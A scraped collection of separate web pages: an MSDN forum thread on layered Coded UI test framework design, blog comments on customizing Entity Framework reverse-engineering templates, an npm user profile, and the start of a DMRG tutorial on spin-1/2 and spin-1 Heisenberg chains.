this particular case is found numerically to be \xi \approx 6. There is an analytic (power law) correction by a square root of the distance in the denominator, but this is often neglected in calculations of the correlation length, as it is a slow contribution compared to the fast exponential decay.
It would matter, of course, if the correlation length were much larger. The spin-1 chain is therefore a prime example of a non-critical quantum system with finite gap and exponentially decaying correlations. As it will turn out, this type of system is much easier for DMRG. Plan Of The Tutorial What we want to achieve in the following tutorial is to be able to calculate all the above quantities on our own using ALPS DMRG, while learning about the principal pitfalls of this numerical project. Vive la difference ... The most important difference to other numerical methods is that DMRG prefers open boundary conditions, such that there are two chain ends at sites 1 and L, not a closed loop as, for example, exact diagonalization and most analytical methods would prefer. This was already implicit in the notation of the Hamiltonian above and will lead to some of the more subtle aspects of DMRG calculations. Running The Code General Remarks Before we start, let us briefly discuss the inner logic of the DMRG algorithm without going into full detail. Given a one-dimensional quantum system with local state spaces of dimension d (d = 2S+1 for spins of length S), the Hilbert space dimension explodes exponentially as d^L with system size L. Exact diagonalization achieves exact results in this exponentially large Hilbert space, at the price of small system sizes. Quantum Monte Carlo gives approximate results by stochastically sampling this large space, reaching much larger system sizes. The density-matrix renormalization group (DMRG) tries yet another approach, namely to identify very small subspaces of the exponentially large Hilbert space which are hoped to contain good, very good, even excellent approximations to the states of interest, such as the ground state. A first key control parameter is therefore the number of kept states m, which controls the dimension of the subspace. DMRG is monotonic in this parameter: the larger it is, the larger is the subspace and the better the approximation can be.
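Before bringing DMRG into play, the exact energies quoted above can be cross-checked for very short chains, where exact diagonalization is still trivial. The following is a minimal numpy sketch (not part of ALPS); it builds H = sum_i S_i.S_{i+1} for an open spin-1/2 chain from Kronecker products and diagonalizes it directly:

```python
import numpy as np

# Spin-1/2 operators (hbar = 1)
sx = np.array([[0.0, 0.5], [0.5, 0.0]])
sy = np.array([[0.0, -0.5j], [0.5j, 0.0]])
sz = np.array([[0.5, 0.0], [0.0, -0.5]])
one = np.eye(2)

def heisenberg_open(L):
    """Dense H = sum_i S_i . S_{i+1} for an open spin-1/2 chain of L sites."""
    H = np.zeros((2 ** L, 2 ** L), dtype=complex)
    for i in range(L - 1):                     # bonds (i, i+1)
        for op in (sx, sy, sz):
            term = np.array([[1.0]])
            for site in range(L):
                term = np.kron(term, op if site in (i, i + 1) else one)
            H = H + term
    return H

for L in (2, 4, 8, 10):
    e0 = np.linalg.eigvalsh(heisenberg_open(L))[0]
    print("L = %2d   E0/L = %.6f" % (L, e0 / L))
```

For L = 2 this gives the singlet energy E0 = -3/4; with growing L the energy per site approaches the Bethe value 1/4 - ln 2 quoted above, though open boundaries make the finite-size convergence slow. Dense diagonalization like this becomes hopeless beyond a dozen or so sites, which is exactly the gap DMRG fills.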
There is also an exact limit: if m is allowed to grow to the full dimension of the block Hilbert space, no states are discarded and the solution would be exact. This is, however, of no practical relevance; if such a large number of states could be handled on the computer, exact diagonalization would be a superior alternative. A remark on notation: given DMRG history, m comes under various names, like matrix dimension or number of block states. The second key control parameter is of course the system size L. The third control parameter(s) can only be understood by looking even closer at the DMRG algorithm. In order to find the best approximation to a state, DMRG proceeds in two steps: - In a first step (so-called infinite-system DMRG) the algorithm tries to find good subspaces by iteratively analyzing chains of length 2, 4, 6, ... until the desired system size L is reached. The procedure consists of splitting the chain in every iteration and inserting two new sites at the center; the name comes from the fact that this procedure could be carried on infinitely, to take L to infinity; but don't expect very meaningful results as you approach infinity! A second remark is that this procedure favours chains of even length for DMRG treatment. - In a second step (so-called finite-system DMRG) DMRG deals with the fact that the subspace selection for shorter chains could not yet take into account all the quantum fluctuations and correlations that are present in the chain of final length L. What the method does is go through a series of further iterations to improve the quality of the subspaces. One such iteration, looking at all sites of a chain, is referred to as a sweep. The number of sweeps is the last important control parameter: if it is chosen too small, the precision reachable for a given m is not achieved; if it is chosen too large, calculational effort is wasted, although it is of course always good to err on the safe side.
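What "keeping m states" means can be made concrete without any DMRG machinery: Schmidt-decompose a state across the center bond and discard all but the m largest weights. A small numpy illustration follows; note it uses a random state, which is far more entangled than the ground state of a gapped chain, so the discarded weights here are large, whereas for the spin-1 chain they would decay very rapidly with m:

```python
import numpy as np

rng = np.random.default_rng(0)
L = 12                                     # 12 spin-1/2 sites
psi = rng.normal(size=2 ** L)
psi /= np.linalg.norm(psi)                 # normalized toy wavefunction

# View the chain as (left half) x (right half) and Schmidt-decompose.
M = psi.reshape(2 ** (L // 2), 2 ** (L // 2))
schmidt = np.linalg.svd(M, compute_uv=False)
weights = schmidt ** 2                     # sorted descending, sum to 1

for m in (4, 16, 64):
    print("m = %3d   discarded weight = %.3e" % (m, weights[m:].sum()))
```

The discarded weight printed here is exactly the truncation error discussed in the next remark: it shrinks monotonically as m grows and vanishes once m reaches the full block dimension (here 64).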
In a last remark, let us consider the truncation error, which is a good indicator of the accuracy achieved by a DMRG run. In a simplified perspective, at each point in the algorithm DMRG makes one step in the direction of exponential growth of the state space and then asks how much accuracy can be retained if not allowing that step, by means of an analysis of a density matrix regarding the distribution of weights (eigenvalues) corresponding to its eigenstates. The approximations of DMRG are then reflected in the fact that some statistical weight has to be discarded, which is the so-called truncation error. In many DMRG applications it can be extremely small (of the order of 10^-10 or less), showing that the approximations made by DMRG are very mild, which is the reason for the enormous success of the method. For the purpose of the tutorial it is important to know that the error in local quantities (energies, magnetizations, ...) is roughly proportional to (but usually quite a bit larger than) the truncation error, provided we are converged in the number of sweeps. The ALPS DMRG Code and Its Control Parameters Besides inputs such as the Hamiltonian and lattice geometry, the DMRG simulation requires a set of specific control parameters. Some of these are listed below. We refer the user to the DMRG reference page for further details. DMRG-specific parameters:
- NUMBER_EIGENVALUES: Number of eigenstates and energies to calculate. Default is 1; should be set to 2 to calculate gaps.
- SWEEPS: Number of DMRG sweeps for the finite-size algorithm. Each sweep involves a left-to-right half-sweep and a right-to-left half-sweep.
- NUM_WARMUP_STATES: Number of initial states to grow the DMRG blocks. If not specified, the algorithm will use a default value of 20 states.
- STATES: Number of DMRG states kept on each half-sweep. The user should specify either 2*SWEEPS different values of STATES or one MAXSTATES or NUMSTATES value.
- MAXSTATES: Maximum number of DMRG states kept.
The user may choose to specify either STATES values for each half-sweep, or a MAXSTATES or NUMSTATES value that the program will use to grow the basis. The program will automatically determine how many states to use for each sweep, increasing the basis size in steps of MAXSTATES/(2*SWEEPS) until reaching MAXSTATES.
- NUMSTATES: Constant number of DMRG states kept for all sweeps.
- TRUNCATION_ERROR: The user can choose to set the tolerance for the simulation instead of the number of states. The program will automagically determine how many states to keep in order to satisfy this tolerance. Care must be taken, since this could lead to uncontrollable growth in the basis size, and a crash as a consequence. It is therefore advisable to also specify the maximum number of states as a constraint, using either MAXSTATES or NUMSTATES, as explained before.
- LANCZOS_TOLERANCE: Tolerance for the diagonalization (Davidson/Lanczos) piece of the code. The default value is 10^-7.
- CONSERVED_QUANTUMNUMBERS: Quantum numbers conserved by the model of interest. They will be used in the code in order to reduce matrices to block form. If no value is specified for a particular quantum number, the program will work in the grand canonical ensemble. For instance, in spin chains, if you do not declare Sz_total, the program will run using a Hilbert space with dim = 2^N states. Running in the "canonical" ensemble (by setting Sz_total=0, for instance) will improve performance considerably by working in a subspace of reduced dimension. For an example of how to do this, take a look at the parms file included with the dmrg code.
How to choose the right parameters It is not recommended to use the default input values. DMRG convergence is strongly affected by the number of states used in the warmup, the number of sweeps, and the maximum number of states kept. Good practice involves looking at the convergence of the ground-state energy and truncation error as a function of the number of states.
This will indicate an optimal number of states to be kept in order to keep the errors below a certain tolerance. In order to determine whether enough sweeps have been performed, it is recommended to look at the spatial distribution of the correlations, or of local quantities such as the Sz projection of the spin or the particle density. For instance, in a model that is symmetric under reflections, we should expect these observables to also be symmetric. Another quantity that should be symmetric is the entanglement entropy. If this behavior is not reflected in the results, it is likely due to running too few sweeps (another plausible scenario is phase separation). If the Hamiltonian preserves quantum numbers, such as Sz or N, it is possible to fix their values and run the simulation in a subspace of reduced dimension. This results in much faster runs and optimal memory usage. Ground State Energies The first question we usually ask is for the ground state and its energy E_0. Here we have to distinguish two cases. First, we might be interested in the ground state energy for a given Hamiltonian on a chain of a given length L. Secondly, we might be interested in the energy per site (or per bond) in the thermodynamic limit. Fixed Length Ground State Energies Consider chains of a few different lengths (the examples below use L=32). Both for spin-1/2 and spin-1, set up ground state energy calculations for a range of numbers of states m. For each length, tabulate the truncation error and the ground state energies as a function of m. Experiment carefully with the number of sweeps to ensure that for a given length and number of states your result is actually converged. - For each system length and spin length, try to establish the connection between the accuracy of the total energy and the truncation error by plotting total energy vs. truncation error. - Observe how the convergence in m deteriorates with length for spin-1/2 and spin-1.
Apart from a global factor of the order of the length, do you see a difference between the convergence behaviour in the two cases? Hint: What you should see is that, but for the global factor, the convergence for large system sizes is only weakly dependent on length for the spin-1 chain, but much more strongly dependent for the spin-1/2 chain. This is because the spin-1 chain physics is dominated by segments of the length of the correlation length, whereas for the spin-1/2 chain there is no finite length scale, because of criticality. - Try to extrapolate the ground state energies for each chain length to the m -> infinity limit. The one dimensional S=1/2 Heisenberg chain Single run The first example consists of setting up a simulation for a spin-1/2 Heisenberg chain with 32 sites and open boundary conditions, keeping 100 states. Using parameter files The parameter file spin_one_half sets the most important parameters:
LATTICE="open chain lattice"
MODEL="spin"
CONSERVED_QUANTUMNUMBERS="N,Sz"
Sz_total=0
J=1
SWEEPS=4
NUMBER_EIGENVALUES=1
L=32
{MAXSTATES=100}
Using the following sequence of commands you can first convert the input parameters to XML and then run the application dmrg:
parameter2xml spin_one_half
dmrg --write-xml spin_one_half.in.xml
The output file spin_one_half.task1.out.xml contains all the computed quantities and can be viewed with a standard internet browser. DMRG will perform four sweeps (four half-sweeps from left to right and four half-sweeps from right to left), growing the basis in steps of MAXSTATES/(2*SWEEPS) until reaching the MAXSTATES=100 value we have declared. This is a convenient default option, but the number of states can be customized, as we show in the spin S=1 example below. Using Python To set up and run the simulation in Python we use the script spin_one_half.py. The first part of this script imports the required modules, prepares the input files as a list of Python dictionaries, writes the input files and runs the application.
import pyalps
import numpy as np
import matplotlib.pyplot as plt
import pyalps.plot

parms = [ {
    'LATTICE'                  : "open chain lattice",
    'MODEL'                    : "spin",
    'CONSERVED_QUANTUMNUMBERS' : 'N,Sz',
    'Sz_total'                 : 0,
    'J'                        : 1,
    'SWEEPS'                   : 4,
    'NUMBER_EIGENVALUES'       : 1,
    'L'                        : 32,
    'MAXSTATES'                : 100
} ]

input_file = pyalps.writeInputFiles('parm_spin_one_half',parms)
res = pyalps.runApplication('dmrg',input_file,writexml=True)
To run this, launch your Python interpreter using the convenience scripts alpspython or vispython. We now have the same output files as in the command line version. Next, we load the properties of the ground state measured by the DMRG code
data = pyalps.loadEigenstateMeasurements(pyalps.getResultFiles(prefix='parm_spin_one_half'))
and print them to the command line.
for s in data[0]:
    print s.props['observable'], ' : ', s.y[0]
Additionally, we can load detailed data from each iteration step
iter = pyalps.loadMeasurements(pyalps.getResultFiles(prefix='parm_spin_one_half'), what=['Iteration Energy','Iteration Truncation Error'])
allowing us to look at how the DMRG algorithm converged to the final results.
plt.figure()
pyalps.plot.plot(iter[0][0])
plt.title('Iteration history of ground state energy (S=1/2)')
plt.ylim(-15,0)
plt.ylabel('$E_0$')
plt.xlabel('iteration')
plt.figure()
pyalps.plot.plot(iter[0][1])
plt.title('Iteration history of truncation error (S=1/2)')
plt.yscale('log')
plt.ylabel('error')
plt.xlabel('iteration')
plt.show()
Using Vistrails To run the simulation in Vistrails, open the file dmrg-01-dmrg.vt and select the workflow labeled "spin 1/2 iterations". Multiple runs Using parameter files We now proceed to illustrate how to set up several runs in a single parameter file, spin_one_half_multiple.
We shall use the example proposed in the tutorial, and simulate a chain of length L=32, changing the number of DMRG states (we shall use a smaller number of states for illustration purposes):

LATTICE="open chain lattice"
CONSERVED_QUANTUMNUMBERS="N,Sz"
MODEL="spin"
Sz_total=0
J=1
NUMBER_EIGENVALUES=1
SWEEPS=4
L=32
{ MAXSTATES=20 }
{ MAXSTATES=40 }
{ MAXSTATES=60 }

As we can see, the main difference from the previous example is the parameters enclosed in braces. As before, we run:

parameter2xml spin_one_half_multiple
dmrg --write-xml spin_one_half_multiple.in.xml

In this case, we will find three output files spin_one_half_multiple.task#.out.xml containing the results.

Using Python

The script spin_one_half_multiple.py sets up three Python dictionaries of parameters with differing MAXSTATES

parms = []
for m in [20,40,60]:
    parms.append({
        'LATTICE'                  : "open chain lattice",
        'MODEL'                    : "spin",
        'CONSERVED_QUANTUMNUMBERS' : 'N,Sz',
        'Sz_total'                 : 0,
        'J'                        : 1,
        'SWEEPS'                   : 4,
        'NUMBER_EIGENVALUES'       : 1,
        'L'                        : 32,
        'MAXSTATES'                : m
    })

After writing parameter files, running the dmrg application and loading the results in the same way as for the single run above, we can print the measurements from all runs.

for run in data:
    for s in run:
        print s.props['observable'], ' : ', s.y[0]

Using Vistrails

In the same dmrg-01-dmrg.vt file as above select the workflow "spin 1/2 multiple" from the history view.

The one dimensional S=1 Heisenberg chain

The S=1 Heisenberg chain requires some special treatment because of the open boundary conditions: as explained above, we need to include an extra site carrying a spin S=1/2 at each end of the chain. This requires defining a new lattice file for the simulation. As it turns out, there is no straightforward way to do this, so we will have to do it manually. To simplify the process, we have included a simple Python script build_lattice.py that will generate the lattice for us. The only input is the number of sites in the lattice.
For instance, by typing

$ alpspython build_lattice.py 6

we shall obtain the output

<LATTICES>
<GRAPH name = "open chain lattice with special edges" dimension="1" vertices="6" edges="5">
<VERTEX id="1" type="0"><COORDINATE>0</COORDINATE></VERTEX>
<VERTEX id="2" type="1"><COORDINATE>2</COORDINATE></VERTEX>
<VERTEX id="3" type="1"><COORDINATE>3</COORDINATE></VERTEX>
<VERTEX id="4" type="1"><COORDINATE>4</COORDINATE></VERTEX>
<VERTEX id="5" type="1"><COORDINATE>5</COORDINATE></VERTEX>
<VERTEX id="6" type="0"><COORDINATE>6</COORDINATE></VERTEX>
<EDGE source="1" target="2" id="1" type="0" vector="1"/>
<EDGE source="2" target="3" id="2" type="0" vector="1"/>
<EDGE source="3" target="4" id="3" type="0" vector="1"/>
<EDGE source="4" target="5" id="4" type="0" vector="1"/>
<EDGE source="5" target="6" id="5" type="0" vector="1"/>
</GRAPH>
</LATTICES>

As we can see, the lattice is defined as a one-dimensional graph that contains six vertices, and edges connecting nearest neighbors. The first and last vertices are of type "0", while the others are of type "1". We shall use this definition to implement the model on top of this lattice, which should contain information about the degrees of freedom living on these vertices. The way to do this is by specifying the parameters:

local_S0=0.5
local_S1=1

To run a lattice with 32 sites we shall then type

$ alpspython build_lattice.py 32 > my_lattice.xml

Using parameter files

Let us see what the final parameter file spin_one should look like:

Clearly, it would be cumbersome to repeat this process for each system size. One way to simplify it is to write a script that does it for us automatically. A simpler one is to define all the lattices we need in a lattice library. We have included a my_lattices.xml file with lattices of sizes .
All we have to do is modify the previous parameter file by replacing the lattice definition as follows:

LATTICE_LIBRARY="my_lattices.xml"
LATTICE="open chain lattice with special edges 32"

where we have included the lattice size in the name.

Using Python

The script spin_one.py defines the parameters in a Python dictionary.

parms = [ { } ]

Apart from parameter and file name changes, it is the same as the spin_one_half.py script explained above.

Using Vistrails

Select the workflow "spin 1 iterations" from the history view in the file dmrg-01-dmrg.vt.

Multiple runs

Using parameter files

As for the spin S=1/2 case, we can now set up multiple runs in a single parameter file as follows:

LATTICE_LIBRARY="my_lattices.xml"
LATTICE="open chain lattice with special edges 32"
MODEL="spin"
local_S0=0.5
local_S1=1
CONSERVED_QUANTUMNUMBERS="N,Sz"
Sz_total=0
J=1
NUMBER_EIGENVALUES=1
SWEEPS=4
{ MAXSTATES=20 }
{ MAXSTATES=40 }
{ MAXSTATES=60 }

Using Python

The same runs can be set up with the script spin_one_multiple.py, which can be obtained from the corresponding spin 1/2 script by replacing the parameters.

Using Vistrails

Select the workflow "spin 1 multiple" from the history view in the file dmrg-01-dmrg.vt.

Ground State Energies Per Site (Bond)

If we look closely at the Hamiltonian, the energy of a chain of length L does not sit on the sites, but on the bonds. A first (naive) attempt therefore consists in taking the results of the last simulations and computing the energy per bond from a single chain. Do you get really close to the values listed in the introduction? What is the wrong underlying assumption? The correct way is to eliminate the effect of the open boundary conditions by considering the energy of one bond at the center of the chain. There are two ways of doing it.

- Calculate the ground state energies of two chains of different lengths, again for the lengths already mentioned above, and take the difference of the two energies divided by the number of bonds added as the energy per bond. What do the results look like now?
- The less costly and usual way would be to use correlators between neighbouring sites (as discussed further below, so postpone this exercise until then) and evaluate the bond energy for sites at the chain center.
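The chain-subtraction method in the first bullet boils down to one line once the two DMRG energies are known. Here is a sketch with made-up numbers, assuming the two chains have lengths L and 2L; the actual ground-state energies would come from DMRG runs like the ones above:

```python
# Hypothetical ground-state energies; substitute the values your DMRG
# runs report for chains of length L and 2L.
L = 32
E_L = -13.9973   # E0 for the chain of length L (made up)
E_2L = -28.1754  # E0 for the chain of length 2L (made up)

# Doubling the chain adds exactly L bonds ((2L - 1) - (L - 1) = L), and
# the contribution of the two open ends cancels in the difference, so:
energy_per_bond = (E_2L - E_L) / L
print(energy_per_bond)
```

The point of the subtraction is precisely that the boundary contributions, which spoil the naive estimate, drop out.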
http://alps.comp-phys.org/mediawiki/index.php?title=ALPS_2_Tutorials:DMRG-01_DMRG&diff=prev&oldid=4302
CC-MAIN-2020-05
refinedweb
3,886
52.09
I am trying to get a new installation of Arch on an IBM T43 laptop working. I have identified my wireless interface; however, I am getting some very odd results. "iw dev wlp11s2 scan" returns:

command failed: Operation not supported (-95)

Investigating this, I ran "dmesg | grep wlp11s2", which returns:

[ 6.620806] systemd-udevd[127]: renamed network interface eth1 to wlp11s2

Anyhow, I have no idea how my interfaces wound up crosswired, and don't know how to correct this issue.

Last edited by WanderingOak (2014-02-06 03:29:30)

Please google persistent network interface naming. This change happened a few months back, and on these forums alone there should be a plethora of information.

Well, I've researched the issue and thought I had it licked, but I still can't get it to work. In /etc/udev/rules.d I created a file (as root) called 70-persistent-net.rules. In the file is:

SUBSYSTEM=="net", ACTION=="add", ATTR{address}=="00:16:41:a7:fa:01", NAME="enp2s0"
SUBSYSTEM=="net", ACTION=="add", ATTR{address}=="00:16:6f:b2:32:91", NAME="wlp11s2"

I know that the MAC address is right, and I know that the device name is right. However, even after a reboot, I still have "renamed network interface eth0 to wlp11s2". I tried the exact same thing in /etc/udev/rules.d/10-network.rules, but it still won't work. Any ideas as to what I am doing wrong?

In post #1, you said eth0; in post #3, you said eth1. Perhaps you fixed it. Have you re-tried your iw dev command?

Nothing is too wonderful to be true, if it be consistent with the laws of nature -- Michael Faraday
You assume people are rational and influenced by evidence. You must not work with the public much. -- Trilby
---- How to Ask Questions the Smart Way

There are some wireless drivers that use the eth* namespace for whatever reason. I have a broadcom card for which I have to use broadcom-wl.
I have patched it to use wlan* (just in case it doesn't get renamed, which happens sometimes), but originally it is set to use eth*.

iw dev wlp11s2 scan still returns:

command failed: Operation not supported (-95)

I've tried changing the permissions of the udev.rules files. Does the ownership matter? I've tried commenting out the 70-persistent-net.rules file (since it was created first), but that didn't work either. Any more ideas?

I changed the names of the interfaces in /etc/udev/rules.d/10-network.rules, and now dmesg | grep net0 (net0 being the wifi interface) returns:

[ 6.603510] systemd-udevd[120]: renamed network interface eth1 to net0

I have to say that I am running out of ideas.

The odd thing is that ip link returns the new names that I gave to my ethernet and wifi interfaces. However, dmesg | grep wifi1 mentions eth1, which is an interface name that I did not create:

[ 6.124178] systemd-udevd[123]: renamed network interface eth1 to wifi1

The interface eth(x) changes back and forth from eth0 to eth1 during each boot.

I am still trying to figure this out.
Right now, my mystery interface is eth0. dmesg | grep eth0 returns the following:

[]
[ 6.523660] systemd-udevd[121]: renamed network interface eth0 to lan-1
[ 6.574364] systemd-udevd[118]: renamed network interface eth0 to wan-1

The MAC address for the Tigon3 is the same as the MAC address for my wifi. When I run "lspci | grep Tigon3" I do not get any results. According to lspci, my wireless is: Intel Corporation PRO/Wireless 2200BG [Calexico2]. So, it looks like I will have to either remove or blacklist the Tigon3 module. Am I on the right track?

The deeper I dig, the more confused I get. lsmod does not return anything about a Tigon3 module, yet dmesg is full of messages about it. dmesg | grep tg3 returns:

[ 5.517289] tg3.c:v3.133 (Jul 29, 2013)
[]
[ 12.865555] tg3 0000:02:00.0 lan-1: Link is up at 100 Mbps, full duplex
[ 12.865573] tg3 0000:02:00.0 lan-1: Flow control is off for TX and off for RX
[84762.590937] tg3 0000:02:00.0 lan-1: Link is down
[84774.594463] tg3 0000:02:00.0 lan-1: Link is up at 100 Mbps, full duplex
[84774.594484] tg3 0000:02:00.0 lan-1: Flow control is off for TX and off for RX

lsmod | grep tg3 doesn't return anything. Any ideas? Am I running down a blind alley, or am I heading in the right direction?

Last edited by WanderingOak (2014-01-29 11:59:13)

This installation was installed from an older ISO, dated October 29th, 2012. I am not sure of the Arch version naming structure, or even if it has one. Anyhow, since I am having such a hassle with this installation, I am starting to wonder if it might be a good idea to just start over from scratch with a current ISO. Yes, the challenge of un-buggering my current installation of Arch Linux has its appeal. However, my end goal is to have a functioning laptop that works the way I want it to (rather than be forced to deal with Ubuntu Unity as a worst-case example (the only thing worse would be Windows 8)), not to spend all of my time trying to get the blasted contraption to work.
So, am I too borked to fix, or do I still have hope?

So many issues; where to begin? I was curious about your plight (and I like your spunk about not giving up) so I fired up my ancient T43 to see what its crusty (but trusty) circuits would do with this.

# iw dev wlp4s2 scan
command failed: Operation not supported (-95)

In fact, almost all of the iw commands borked on that old Intel Corporation PRO/Wireless 2200BG wireless chip. I had just finished a git pull on Linus' kernel, so I went to the fresh source code and found this in drivers/net/wireless/ipw2x00/libipw_module.c:

static struct cfg80211_ops libipw_config_ops = { };

So it appears, just like the Linux Wireless web page says ( … on/nl80211)... that nl80211 and cfg80211 are still under development. Further confirmation comes from the Kconfig file, where it specifies CONFIG_CFG80211_WEXT for the IPW2200 module ( … n/cfg80211). Not much of a surprise that this newfangled method using iw hasn't been ported to this ancient wireless driver, since it doesn't get much love anymore. However, the old tired but true wireless_tools package still works like a champ here, so I strongly suggest you give that a shot.

As for that Tigon3:

# lspci -k -s 02:00.0
02:00.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5751M Gigabit Ethernet PCI Express (rev 11)
Subsystem: IBM ThinkPad Z60t
Kernel driver in use: tg3
Kernel modules: tg3

It indeed uses the tg3 module (but this got the "Subsystem" totally wrong). And that module is loaded on my T43:

# lsmod|grep tg3
tg3 141438 0
ptp 6876 1 tg3
libphy 17529 1 tg3

But this is the wired ethernet, so I'm not sure what problem you're trying to solve messing with that. I assume you don't like the goofy name. Me, I let them change it to their funny names (they must have been trying to solve a problem I didn't have), and simply installed wicd because it just works. But I'll be the first to admit that it's sometimes fun to twiddle with things.

tldr; Suggestion...
Remove all your changes. Then install wicd and possibly the wireless_tools package(s). Remove and/or unconfigure anything else touching the network devices (Example: netctl... pay special attention to systemd here, or may the gods forbid, Gnome's Network Manager, which is a pox upon us), and then configure wicd (using the strange device names). At least that's what works for me on my T43, running Arch for the last umpteen years.

Last edited by pigiron (2014-02-01 09:00:40)

However, the wireless_tools package still works like a champ here, so I strongly suggest you give that a shot.

On the [arch-releng] mailing list recently the idea of dropping wireless_tools from the Archiso was brought up. It was ultimately shot down because there are still a few devices out there that are still not compatible with iw. I am fairly certain that the example that came up was in fact the hardware that uses the ipw2200-fw package.

Well, apparently wicd worked, because I am now connected wirelessly. As far as ipw2200-fw goes, I was able to download it but I am not sure if it is loaded, as it does not show up under dmesg or lsmod. modprobe ipw2200-fw returns:

modprobe: FATAL: Module ipw2200-fw not found.

Apparently I still have issues. On boot, wicd asks me for my password so it can access my network cards. I then get an error message: "Failed to run /usr/bin/wicd as root. The underlying authorization mechanism (sudo) does not allow you to run this program. Contact your system administrator." When I click through that message, I get the following error message: "Could not connect to wicd's D-Bus interface. Check the wicd log for error messages." If I try to start wicd manually, I get the above error messages twice, plus the following message once (the second time): "Error connecting to wicd service via D-Bus. Please ensure that the wicd service is running."

Those messages went away when I edited my sudoers file to allow the wheel group access without a password.
Then I was able to launch wicd manually and see my wireless networks, but I still could not connect. I rebooted, only to see the following message after starting X: "The wicd daemon has shut down. The UI will not function properly until it is restarted." I do not see the above error message when starting wicd manually. However, even though I can see my local wifi networks, I am still unable to connect. It goes through the motions (validating authentication, connecting), and then says 'not connected'. The wicd logs do not provide any help. I am running Xfce as my Desktop Environment.

How are you trying to start the wicd daemon? It sounds as though you have just set it up to be run at login by your DE. You need to start/enable the service.

I had wicd-gtk --tray set up to run automatically on boot. I added wicd, and now I do not get any error messages on boot. I am able to see all of the wifi networks that are available to me. However, I am still unable to connect. My latest attempt to connect to my wifi was logged as:

2014/02/04 17:08:26 :: Connecting to wireless network belkin.b7c
2014/02/04 17:08:26 :: Putting interface down
2014/02/04 17:08:26 :: Releasing DHCP leases...
2014/02/04 17:08:27 :: Setting false IP...
2014/02/04 17:08:27 :: Stopping wpa_supplicant
2014/02/04 17:08:27 :: Flushing the routing table...
2014/02/04 17:08:27 :: Putting interface up...
2014/02/04 17:08:29 :: Generating psk...
2014/02/04 17:08:29 :: Attempting to authenticate...
2014/02/04 17:08:30 :: Running DHCP with hostname archlaptop
2014/02/04 17:08:30 :: dhcpcd[1329]: sending commands to master dhcpcd process
2014/02/04 17:08:30 ::
2014/02/04 17:08:30 ::
2014/02/04 17:08:30 :: DHCP connection successful
2014/02/04 17:08:30 :: not verifying
2014/02/04 17:08:30 :: Connecting thread exiting.
2014/02/04 17:08:30 :: Sending connection attempt result success

I am able to verify that my wifi is functioning. Both my iPod and Blu-ray player can connect without any issues.
Please use proper quote and code tags. What did you add wicd to? How are you starting wicd? It is not meant to just be called from the window manager's autostart system. It is meant to be run as a system service (via systemd).

Okay, I ran "systemctl enable wicd", and I am still unable to connect wirelessly. "systemctl | grep wicd" returns:

wicd.service loaded active running Wicd a wireless and wired network manager for Linux

I removed wicd from the autostart system and rebooted, but still no luck.

Do you have conflicting network management services? You can only have one at a time.

I ran "systemctl --type=service" to see if any other network management services aside from wicd were running. I didn't see anything, but I remembered installing networkmanager, so I removed it with pacman. I am still unable to connect wirelessly.
https://bbs.archlinux.org/viewtopic.php?id=175899
New firmware release 1.0.0.b1

Hello everyone,

Firmware 1.0.0.b1 has just been released. These are the notes from the change log:

- Add bind method to LoRa sockets. This allows specifying a port number different than the default of 2.
- Add the Bluetooth network class with WiFi co-existence.
- Refactor the LoRa module to use event groups.
- Update to the latest IDF from Espressif.
- Only try to send via LoRaWAN if the network is joined.
- Avoid glitches when configuring pins.
- Add support for SHA-224.
- Allow passing a manual DEV_EUI during LoRa OTAA join.

The most important feature here is that we have added BLE support; it's very basic for now, but we will now be able to start adding more features in the next releases. For details check the docs:

As usual the updater tools for the new firmware can be downloaded from: (Under Firmware Updates)

Cheers,
Daniel

@livius regarding your problem trying to connect 2 WiPy's together, please check my reply in: Thanks.

Cheers,
Daniel

Hi Mophor, we'll check this issue immediately, and if there's a problem when performing a WiFi scan after a BLE scan then we'll fix it. Coexistence is happening for sure; you can check it by enabling BLE and doing the scan from telnet when being connected to the LoPy in AP mode. The memory being overwritten is OK, that portion of memory is already reserved for BLE usage.

Cheers,
Daniel

@robert-hh @daniel If we end up using LoPy for a project / class, it'd be great to have students build the whole thing, even if just once. Many had never installed an OS before working with a Pi.

- jmarcelino last edited by jmarcelino

@bmarkus This is a common question with the ESP32 - see the long discussion at . ESP32 specs list RAM as one big block (400KB! 540KB!); however, that's not really all available to applications - at least not in a simple way. The ESP-IDF (the "core" SDK of the ESP32) is also not currently optimised for memory.
From that thread the "official answer" is:

We indeed will be working on minimizing esp-idf RAM usage at a certain point in time; for now, we think it's more important to get all features in first.

Once the ESP-IDF reaches feature stability and they start looking into memory improvements, I'd expect those savings will translate into the *Py environment as well.

With each firmware update we get less and less free RAM. Now it is only 51k. During the Kickstarter campaign I got the impression we would get much more free RAM. It seems that new features eat up memory. Does it mean that at the end of the road, with a working LoRa stack, BT and so on, there will be no RAM available, or does RAM availability limit the introduction of new or missing features? I hope that is not the case. I would appreciate an explanation of how RAM is used by the system.

Hello Daniel, this is a big improvement. Would you mind updating the github repository, so that I can enable support of .mpy files?
Robert

@daniel In this release note you have mentioned WiFi and BLE Coexistence. I have tried a very simple REPL script to check if that's true, and I'm sorry to say I have found it's not! I have tried importing BLE first like this:

from network import Bluetooth
ble = Bluetooth()  # Heartbeat LED turns constant blue.
ble.scan()  # outputs a few bluetooth devices in 10 secs
from network import WLAN
wifi = WLAN(mode = WLAN.STA)
wifi.scan()  # REPL won't give back the control and it never finishes the task

This is a little different if the order was reversed:

from network import WLAN
wifi = WLAN(mode = WLAN.STA)
wifi.scan()  # Outputs list of WiFi devices very fast
from network import Bluetooth
ble = Bluetooth()
ble.scan()  # Outputs a list of BLE devices in 10 seconds.
wifi.scan()  # Won't ever return the control.

So, in essence, yeah, there is no coexistence, even for the simple scan functionality! This means that if Bluetooth is imported, WLAN won't work. I have tested the scan functionality for both, but that's bad enough for my scenario.
Any comments?

Update: It seems vital to mention that, from the looks of it, instantiating Bluetooth overwrites memory like this:

from network import Bluetooth
..:..:..:..:..:..

Is that a right assessment?

@pipomolo I faced the same issue last week. My problem was related to installed FTDI drivers. Have you tried to install FTDI drivers on your Mac? If so, you need to remove one of them and leave just one acting driver live. You can find more info on the related FTDI driver's page:

@daniel Hi Daniel, I have just tried to upgrade my 3 recently received LoPy with the latest firmware here, and after installing the PyMaker (which works with the actual version of the LoPy) and then trying with the PyCom firmware Update software, on an iMac, connected with a USB cable (and selecting the /dev/cu.Bluetooth-Incoming-Port for Serial), I face the same problem. Failed. It seems there is an issue with the serial / USB driver? I have tried with a MacBook Pro also, and I face the same issue. I use the same interface and cable to program my Arduino without issues. I have also tried to change the speed (9600, 19200) in the related .py file, but no luck. Thanks for pointing me to a relevant doc or tool.

